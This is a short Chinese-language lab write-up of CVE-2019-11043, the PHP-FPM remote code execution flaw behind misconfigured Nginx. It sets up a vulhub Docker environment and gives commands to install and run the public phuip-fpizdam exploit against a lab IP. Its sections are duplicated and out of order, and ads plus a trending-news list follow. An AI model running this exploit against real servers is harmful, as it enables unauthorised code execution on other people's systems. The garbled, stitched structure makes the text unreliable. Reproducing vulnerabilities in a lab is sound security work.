CVE-2019-11043 PHP-FPM执行任意代码
0x00背景
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
0x01环境搭建
下载漏洞环境,使用docker搭建,漏洞环境地址https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043,进入漏洞环境目录,执行docker-compose up -d命令,进行安装。
漏洞环境搭建成功,如图
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
漏洞环境搭建成功,如图
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
./phuip-fpizdam http://192.168.175.135:8080/index.php
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
HackerEye
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 三个层面看我国民营经济发展前景 7975784
- 2 小伙30多万买机器人对外租8000一天 7975404
- 3 《哪吒2》成香港单日票房榜冠军 7803364
- 4 产业“破题” 绘就振兴“答卷” 7736519
- 5 客机西安起飞后返航 引擎冒火光 7607654
- 6 偶像剧终于有不回避成长女主了 7560129
- 7 4人喝100瓶酒1人坠亡 KTV被判赔48万 7475075
- 8 女孩逃票进景区后坠亡 景区被判无责 7320899
- 9 8岁孩子厨房玩刀意外刺破肝脏 7267364
- 10 欧洲多国领导人:俄乌和谈不能缺乌欧 7126121
